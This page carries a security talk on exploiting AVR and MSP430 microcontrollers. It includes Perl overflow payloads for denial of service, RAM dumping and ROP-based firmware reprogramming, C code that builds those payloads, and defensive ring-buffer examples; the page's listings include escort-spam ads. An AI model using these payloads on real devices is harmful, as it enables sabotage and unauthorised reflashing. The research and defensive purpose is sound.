AVR & MSP exploitation

Vadim Bardakov
Security Researcher
Digital Security (ERPScan)

Why now?
• Increasing use of microcontrollers
• Nobody cares about code security for these devices
• Increasing number of easily accessible data channels
• Microcontroller firmware can be retrieved

© 2002—2013, Digital Security

Jokes

What if it works?

Oops…

Firmware extraction

Side channel attacks
• Power analysis
• Planarization (invasive: the decapped die is polished down layer by layer)
• etc.

Firmware extraction (MSP430 families):
• FRAM
• 5xx
• 6xx

RAM

(Diagram: MSP430 memory map next to the AVR memory map.)

RAM (AVR data address space, from low to high addresses)
• General purpose registers
• I/O special function registers
• Additional I/O registers
• Internal RAM

Stack errors

(Figure sequence over the AVR data space map: general purpose registers, I/O special function registers, additional I/O registers, internal RAM.)

AVR has no memory protection: SP is a 16-bit value into that same address space, and a push goes wherever it points.

• The stack sits at the top of internal RAM and grows downward; the figure shows the stack region filled with 0xff bytes.
• Interrupt handlers (UART, timers, comparators, INT0..X) keep pushing onto that corrupted stack, and SP walks out of internal RAM into the I/O register area.
• Reconfiguring peripheral devices: with 0x00 bytes landing in the I/O registers, control of the device is lost.
• With 0x20 bytes landing there it "seems OK".
• Unknown offset: the attacker does not know the distance from the buffer to the target.
• Global variables share the internal RAM with the buffer, so an overflow of the buffer reaches them.
• Bypassing checks: overwrite the variables the checks read.
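What the figure sequence shows, in numbers. This is an added example, not code from the talk: a host-side C model of the AVR data address space with an assumed ATmega328P-like layout (registers 0x00-0x1F, I/O 0x20-0x5F, extended I/O 0x60-0xFF, internal RAM 0x100-0x8FF), AVR push semantics, and an interrupt entry that pushes onto a stack whose SP has already been driven to the bottom of RAM. It also carries the two checks a firmware developer can afford on such a part: an SP range check and a painted-stack high-water mark. The 18-byte saved context and the 0xC5 paint value are constructed for the example.

```c
/* Added example: host-side model of the AVR data address space.
 * The layout is an assumed ATmega328P-like one (R0..R31, 64 I/O registers,
 * 160 extended I/O registers, 2 KiB of SRAM); the numbers are not from
 * the talk. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IO_START      0x0020   /* I/O special function registers start here */
#define EXT_IO_START  0x0060   /* additional (extended) I/O registers */
#define SRAM_START    0x0100   /* internal RAM */
#define RAMEND        0x08FF   /* last byte of internal RAM */
#define DATA_SIZE     (RAMEND + 1)

enum region { REG_FILE, IO_SFR, EXT_IO, SRAM, UNMAPPED };

enum region classify(uint16_t addr)
{
    if (addr < IO_START)      return REG_FILE;
    if (addr < EXT_IO_START)  return IO_SFR;
    if (addr < SRAM_START)    return EXT_IO;
    if (addr <= RAMEND)       return SRAM;
    return UNMAPPED;
}

struct avr_model {
    uint8_t  mem[DATA_SIZE];
    uint16_t sp;   /* SPH:SPL, points at the next free byte; no hardware bound */
};

void avr_reset(struct avr_model *m)
{
    memset(m->mem, 0, sizeof m->mem);
    m->sp = RAMEND;
}

/* PUSH semantics: store at SP, then decrement SP. Returns 1 if the byte
 * landed in a peripheral register. */
static int avr_push(struct avr_model *m, uint8_t b)
{
    enum region r = classify(m->sp);
    if (r != UNMAPPED)
        m->mem[m->sp] = b;
    m->sp--;
    return r == IO_SFR || r == EXT_IO;
}

/* Interrupt entry: the hardware pushes the return address low byte first,
 * so the high byte ends up at the lower address (the order the talk's
 * "\x01\xFC" payload uses), then the handler prologue saves its context.
 * Returns how many of the pushed bytes hit I/O registers. */
int isr_entry(struct avr_model *m, uint16_t ret_word_addr,
              const uint8_t *ctx, size_t ctx_len)
{
    int io_hits = 0;
    io_hits += avr_push(m, (uint8_t)(ret_word_addr & 0xFF));
    io_hits += avr_push(m, (uint8_t)(ret_word_addr >> 8));
    for (size_t i = 0; i < ctx_len; i++)
        io_hits += avr_push(m, ctx[i]);
    return io_hits;
}

/* Check 1: SP must still point into internal RAM. */
int sp_is_sane(const struct avr_model *m)
{
    return m->sp >= SRAM_START && m->sp <= RAMEND;
}

/* Check 2: paint the free RAM above .bss at start-up ... */
void paint_stack(struct avr_model *m, uint16_t from, uint8_t pattern)
{
    memset(&m->mem[from], pattern, (size_t)(RAMEND - from + 1));
}

/* ... and later measure how far down the stack ever reached. A pushed byte
 * that happens to equal the pattern hides one byte of depth, which is why
 * a rarely seen value is used as the pattern. */
size_t stack_bytes_used(const struct avr_model *m, uint16_t from, uint8_t pattern)
{
    size_t free_bytes = 0;
    for (uint32_t a = from; a <= RAMEND && m->mem[a] == pattern; a++)
        free_bytes++;
    return (size_t)(RAMEND - from + 1) - free_bytes;
}
```

On real hardware the SP check belongs in the main loop or a watchdog-driven task, and the paint belongs in the start-up code before main; neither stops a push from landing in a peripheral register, they only make the condition visible before the device "seems OK" with a reconfigured peripheral.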

Buffer overflow

What the overflow can reach:
• Local variables
• Return address, which can be pointed at:
  • Compiler-generated instructions
  • Interrupt handlers
  • The bootloader

Buffer overflow

    ISR(UART0_RECEIVE_INTERRUPT)
    {
        UART_RxHead++;                        /* no wrap, no bounds check */
        UART_RxBuf[UART_RxHead] = UART0_DATA;
    }

Typical of UART handlers: the index is incremented without ever being compared with the buffer size, so every byte received after the buffer is full is written past its end.
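The slide's handler modelled on the host, next to a hardened ring buffer, as an added example that is not code from the talk. The layout (a 32-byte receive buffer with a login flag placed right after it by the linker) and the traffic are constructed; the 8-bit index keeps the vulnerable writes inside the 256-byte model, whereas a 16-bit UART_RxHead on a real part keeps walking up through the rest of internal RAM.

```c
/* Added example: the talk's UART receive handler modelled on the host,
 * next to a hardened ring buffer. Layout and traffic are constructed. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define RXBUF_SIZE   32
#define AUTH_FLAG    RXBUF_SIZE   /* linker put the flag right after the buffer */
#define SRAM_MODEL   256          /* an 8-bit index can never leave this array */

/* ---- vulnerable: ISR(UART0_RECEIVE_INTERRUPT) from the slide ---- */
struct vuln_uart {
    uint8_t sram[SRAM_MODEL];   /* UART_RxBuf starts at offset 0 */
    uint8_t rx_head;            /* UART_RxHead: wraps at 256, never checked */
};

void vuln_init(struct vuln_uart *u) { memset(u, 0, sizeof *u); }

void vuln_isr(struct vuln_uart *u, uint8_t udr)
{
    u->rx_head++;                     /* UART_RxHead++; */
    u->sram[u->rx_head] = udr;        /* UART_RxBuf[UART_RxHead] = UART0_DATA; */
}

/* What the main loop checks later: the flag that lives beyond the buffer. */
int vuln_login_ok(const struct vuln_uart *u) { return u->sram[AUTH_FLAG] != 0; }

size_t vuln_feed(struct vuln_uart *u, const uint8_t *data, size_t len)
{
    for (size_t i = 0; i < len; i++)
        vuln_isr(u, data[i]);
    return len;   /* every byte is stored somewhere */
}

/* ---- hardened: bounded ring buffer ---- */
#define RX_SIZE 32   /* power of two so the index can be masked */

struct safe_uart {
    volatile uint8_t buf[RX_SIZE];
    volatile uint8_t head;     /* written only by the ISR */
    volatile uint8_t tail;     /* written only by the consumer */
    volatile uint8_t overruns; /* bytes dropped because the buffer was full */
};

void safe_init(struct safe_uart *u) { memset(u, 0, sizeof *u); }

void safe_isr(struct safe_uart *u, uint8_t udr)
{
    uint8_t next = (uint8_t)((u->head + 1) & (RX_SIZE - 1));
    if (next == u->tail) {     /* full: drop and count, never overwrite */
        u->overruns++;
        return;
    }
    u->buf[u->head] = udr;
    u->head = next;            /* publish only after the byte is stored */
}

/* Consumer side: -1 when empty. */
int safe_getc(struct safe_uart *u)
{
    if (u->tail == u->head)
        return -1;
    uint8_t c = u->buf[u->tail];
    u->tail = (uint8_t)((u->tail + 1) & (RX_SIZE - 1));
    return c;
}

size_t safe_feed(struct safe_uart *u, const uint8_t *data, size_t len)
{
    uint8_t before = u->overruns;
    for (size_t i = 0; i < len; i++)
        safe_isr(u, data[i]);
    return len - (uint8_t)(u->overruns - before);
}
```

Note the detail the original code hides: because the index is incremented before the store, element 0 is never written and the 32nd received byte, not the 33rd, is the first one past a 32-byte buffer. The ring buffer holds RX_SIZE - 1 bytes and reports overruns instead of silently accepting them; a protocol layer that sees the counter move can resynchronise rather than parse garbage.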

The slide's receive handler, attacked blindly with a Perl one-liner: B filler bytes, then the return address repeated N times so that it hits the saved return address whatever the (unknown) offset is:

    print "\xff" x B . "\x01\xFC" x N;

Atmel Studio 6.1 shows what sits at word address 0x01FC:

    000001FB CLI
    000001FC RJMP PC-0x0000

Returning there disables interrupts and loops forever. The degenerate form, nothing but 0xff bytes, ends the same way:

    print "\xff" x N;

Either way: DoS.

Buffer overflow: dumping RAM

The same handler, plus an output routine that almost every firmware has:

    void uart_puts(const char *s)
    {
        while (*s)
            uart_putc(*s++);
    }

    print "\xff" x B . "\x01\xFC" x N . P;

The return address is pointed at the compiler-generated call of uart_puts(p), which loads the pointer argument from the current stack frame; the tail P of the payload supplies that frame, so the attacker chooses what gets sent out:

    uart_puts(p);
    000001C8 LDD R24,Y+1       ; load indirect with displacement (low byte of p)
    000001CA LDD R25,Y+2       ; load indirect with displacement (high byte of p)
    000001CB CALL 0x0000014E   ; call subroutine

Reprogramming

Open-source bootloaders suck in production: their code, and with it the location of every SPM instruction, is public.

Reprogramming, step 1: load the code into RAM

    print "\xff" x B . "\x00\x16" x N . ROPTail;

The return address 0x0016 lands in an interrupt handler. Interrupt handlers are ideal for ROP: their epilogues are runs of pop instructions ending in reti, so one return into them loads a whole set of registers and continues the chain.

Reprogramming, step 2: gain control of SPM

    print Code . "\x00\xFC" x N . P;

Atmex
    +00000343: 95E8    SPM    ; store program memory
    ....
    +00000351: 95E8    SPM    ; store program memory

Returning into the bootloader's SPM (store program memory) instructions writes the code that was loaded into RAM to FLASH. Lock bits only go so far here: a bootloader that has to update the application needs SPM write access to the application section, so what has to go is the reachable, unauthenticated path into SPM.
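The DoS, RAM-dump and reprogramming payloads above are all the same shape: B filler bytes, a return address repeated N times, then a tail. As an added example, not code from the talk, here is that builder in C with the AVR stack byte order spelled out. The word address 0x01FC and its "\x01\xFC" encoding are taken from the slides; the fill sizes, repeat counts and tail bytes are constructed, and the parity helper covers the one blind-offset failure mode the slides' "unknown offset" point runs into.

```c
/* Added example: builds the talk's  "\xff" x B . ADDR x N . P  payload in
 * C, with the AVR stack byte order made explicit. Sizes and tail bytes are
 * constructed; only the address 0x01FC comes from the slides. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* The AVR program counter counts 16-bit words, and a return address sits on
 * the stack with its high byte at the lower address. Word address 0x01FC is
 * therefore sent as the two bytes 0x01, 0xFC, exactly as in the talk. */
void avr_ret_addr_bytes(uint16_t word_addr, uint8_t out[2])
{
    out[0] = (uint8_t)(word_addr >> 8);
    out[1] = (uint8_t)(word_addr & 0xFF);
}

/* Disassemblers that show byte offsets need halving before use. */
uint16_t avr_byte_to_word_addr(uint32_t byte_addr)
{
    return (uint16_t)(byte_addr >> 1);
}

/* filler x filler_len . ret_word_addr x repeats . tail
 * Returns the payload length, or 0 when it does not fit in out[]. */
size_t build_payload(uint8_t *out, size_t cap,
                     uint8_t filler, size_t filler_len,
                     uint16_t ret_word_addr, size_t repeats,
                     const uint8_t *tail, size_t tail_len)
{
    size_t need = filler_len + 2 * repeats + tail_len;
    if (need > cap)
        return 0;
    uint8_t addr[2];
    avr_ret_addr_bytes(ret_word_addr, addr);
    memset(out, filler, filler_len);
    size_t pos = filler_len;
    for (size_t i = 0; i < repeats; i++) {
        out[pos++] = addr[0];
        out[pos++] = addr[1];
    }
    memcpy(out + pos, tail, tail_len);
    return need;
}

/* Blind-offset caveat: repeating a two-byte address only covers saved
 * return addresses that start an even number of bytes into the repeated
 * run; at an odd distance the CPU reads FC 01 instead of 01 FC. Given the
 * buffer-relative offset of the return address slot, report whether this
 * payload hits it. A blind attacker sends both parities (filler_len and
 * filler_len + 1). */
int spray_hits_slot(size_t filler_len, size_t repeats, size_t slot_off)
{
    if (slot_off < filler_len)
        return 0;
    size_t rel = slot_off - filler_len;
    return rel + 2 <= 2 * repeats && (rel % 2) == 0;
}
```

Two things the one-liners leave implicit and the code makes explicit: the address repeated into the buffer is a word address (0x01FC is byte offset 0x3F8 in the hex file), and the repetition only works for one parity of offset, which is why a blind run is really two runs.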

Summary

• Simple attacks can be conducted blindly
• Different consequences:
  • DoS
  • Modifying device configuration
  • Reprogramming the device
  • etc.

Digital Security in Moscow: +7 (495) 223-07-86
Digital Security in Saint Petersburg: +7 (812) 703-15-47
www.dsec.ru
www.erpscan.com
v.bardakov@dsec.ru
Nedospasov defcon russia 23
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
 

Dernier

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 

Dernier (20)

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 

Vadim Bardakov - AVR & MSP exploitation

  • 1. AVR & MSP exploitation. Vadim Bardakov, Security Researcher, Digital Security (ERPScan)
  • 2–3. Why now?
    • Increasing usage of microcontrollers (uC)
    • Nobody cares about code security for these devices
    • Increasing amount of easily accessible data channels
    • Microcontroller firmware can be retrieved
    © 2002—2013, Digital Security
  • 4. Jokes
  • 5. What if it works?
  • 6. Oops…
  • 7–8. Firmware extraction. Side channel attacks:
    • Power analysis
    • Planarization
    • etc.
  • 9. Firmware extraction. MSP430:
    • FRAM
    • 5xx
    • 6xx
  • 10. RAM: MSP vs. AVR (diagram)
  • 11. RAM (AVR data memory layout): General purpose registers; I/O Special Function Registers; Additional I/O registers; Internal RAM
  • 12–13. Stack errors. [Diagram: the same memory layout, with SP pointing into Internal RAM and the stack region shown as rows of ff]
  • 14–15. Stack errors. Interrupt handler: UART, Timers, Comparators, INT0..X. [Diagram: the rows of ff grow with each interrupt, SP moves toward the register area]
  • 16–19. Stack errors. Reconfiguring peripheral devices…. Lost control. [Diagram: the overflowed region, now next to the I/O registers, shown as rows of 00]
  • 20. Stack errors. Reconfiguring peripheral devices…. Seems OK. [Diagram: the same overflow, shown as rows of 20]
  • 21. Stack errors. Unknown offset. Global Variables (in Internal RAM)
  • 22. Stack errors. Bypassing checks
  • 23. Buffer overflow. Access:
    • Local variables
    • Return address:
      • Compiler-generated instructions
      • Interruption
      • Bootloader
  • 24. Buffer overflow. Common in UART handlers:
        ISR(UART0_RECEIVE_INTERRUPT) {
            UART_RxHead++;
            UART_RxBuf[UART_RxHead] = UART0_DATA;
        }
  • 25. Buffer overflow (same handler). print “xff”xB . “x010xFC”xN
    Atmel Studio 6.1:
        000001FB CLI
        000001FC RJMP PC-0x0000
  • 26–27. Buffer overflow (same handler). print “xff”xN
        000001FB CLI
        000001FC RJMP PC-0x0000
    DoS
  • 28. Buffer overflow (same handler), plus:
        void uart_puts(const char *s) {
            while (*s) uart_putc(*s++);
        }
    print “xff”xB . “x010xFC”xN. P
    uart_puts(p);
        000001C8 LDD R24,Y+1
        000001CA LDD R25,Y+2
        000001CB CALL 0x0000014E
    (Load indirect with displacement; Load immediate; Call subroutine)
    Dumping RAM
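Host-side model of the unchecked UART receive handler from slides 24–28 next to a bounded ring-buffer version, added here as an example and not code from the talk; the function names, the 16-byte buffer size and the drop-on-full policy are assumptions.

```c
/* Constructed example: the slide's "head++; buf[head] = data" pattern
 * modelled on a host so it can be run, beside a bounded ring buffer.
 * Not code from the talk; names and sizes are assumptions. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define UART_RX_BUFFER_SIZE 16                 /* must be a power of two */
#define UART_RX_BUFFER_MASK (UART_RX_BUFFER_SIZE - 1)

typedef struct {
    uint8_t  buf[UART_RX_BUFFER_SIZE];
    uint8_t  head;     /* index of the last byte written by the ISR */
    uint8_t  tail;     /* index of the last byte consumed by main code */
    uint16_t dropped;  /* bytes discarded because the buffer was full */
} uart_rx_t;

/* Unchecked pattern from the slides: head only ever grows, so the 16th
 * byte would land past the buffer in whatever follows it in SRAM (on the
 * AVR that is the rest of the data space, including the stack). The model
 * refuses the out-of-range write instead of corrupting memory, and reports it. */
bool uart_rx_unchecked(uart_rx_t *u, uint8_t data) {
    u->head++;
    if (u->head >= UART_RX_BUFFER_SIZE)
        return false;                       /* would write out of bounds */
    u->buf[u->head] = data;
    return true;
}

/* Bounded handler: the index is masked to the buffer and a full buffer
 * drops the byte instead of overwriting unread data or anything beyond. */
bool uart_rx_bounded(uart_rx_t *u, uint8_t data) {
    uint8_t next = (uint8_t)((u->head + 1) & UART_RX_BUFFER_MASK);
    if (next == u->tail) {                  /* full: consumer has not caught up */
        u->dropped++;
        return false;
    }
    u->head = next;
    u->buf[next] = data;
    return true;
}

/* Consumer side of the bounded buffer: one byte per call, false when empty. */
bool uart_rx_read(uart_rx_t *u, uint8_t *out) {
    if (u->head == u->tail)
        return false;
    u->tail = (uint8_t)((u->tail + 1) & UART_RX_BUFFER_MASK);
    *out = u->buf[u->tail];
    return true;
}

/* Feed n bytes of a constructed 0xff flood (the slides' "xff" x N) through
 * a handler; returns how many bytes the handler actually stored. */
int feed(uart_rx_t *u, bool (*handler)(uart_rx_t *, uint8_t), int n) {
    int stored = 0;
    for (int i = 0; i < n; i++)
        if (handler(u, 0xff))
            stored++;
    return stored;
}

int main(void) {
    uart_rx_t a = {0}, b = {0};
    printf("unchecked: stored %d, head ended at %u (buffer is %d bytes)\n",
           feed(&a, uart_rx_unchecked, 40), a.head, UART_RX_BUFFER_SIZE);
    printf("bounded:   stored %d, dropped %u\n",
           feed(&b, uart_rx_bounded, 40), b.dropped);
    return 0;
}
```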
  • 29. Reprogramming
  • 30. Reprogramming. Open-source bootloaders suck in production.
  • 31. Reprogramming. Load code to RAM: print “xff”xB . “x000x16”xN. ROPTail. Interruption handler: ideal for ROP
  • 32. Reprogramming. Gain control of SPM: print Code . “x000xFC”xN. P
    Atmex:
        +00000343: 95E8 SPM    Store program memory
        ….
        +00000351: 95E8 SPM    Store program memory
    Writing code to FLASH
  • 33. Summary
    • Simple attacks can be conducted blindly
    • Different consequences: DoS, modifying device configuration, etc.
  • 34. Digital Security in Moscow: +7 (495) 223-07-86. Digital Security in Saint Petersburg: +7 (812) 703-15-47. www.dsec.ru www.erpscan.com v.bardakov@dsec.ru